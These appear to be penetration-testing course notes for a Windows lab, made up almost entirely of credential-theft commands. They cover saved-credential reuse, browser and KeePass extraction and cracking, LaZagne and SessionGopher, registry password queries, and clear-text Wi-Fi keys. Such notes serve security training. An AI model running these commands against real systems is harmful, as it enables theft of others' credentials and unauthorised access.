21.Further-credential-theft

cmdkey /list
runas /savecred /user:inlanefreight\bob "COMMAND HERE"

.\SharpChrome.exe logins /unprotect

python2.7 keepass2john.py ILFREIGHT_Help_Desk.kdbx
hashcat -m 13400 keepass_hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt

.\lazagne.exe -h
.\lazagne.exe all

Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh

netsh wlan show profile
netsh wlan show profile ilfreight_corp key=clear

1. Cmdkey Saved Credentials

List saved credentials: cmdkey /list
Use saved credentials with runas: runas /savecred /user:inlanefreight\bob "COMMAND HERE"

2. Browser Credentials

3. Password Managers

Extract KeePass hash: python2.7 keepass2john.py ILFREIGHT_Help_Desk.kdbx
Crack KeePass hash with Hashcat: hashcat -m 13400 keepass_hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt

4. Email

Search emails for passwords (using MailSniper): (Refer to MailSniper documentation for specific commands)

5. LaZagne

6. SessionGopher

7. Clear-Text Passwords in Registry

Windows Autologon:
- Enumerate Autologon settings: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
PuTTY:
- Enumerate PuTTY sessions: reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
- Query specific session: reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh

8. Wifi Passwords

View saved wireless networks: netsh wlan show profile
Retrieve saved wireless password: netsh wlan show profile ilfreight_corp key=clear

Last updated 8 months ago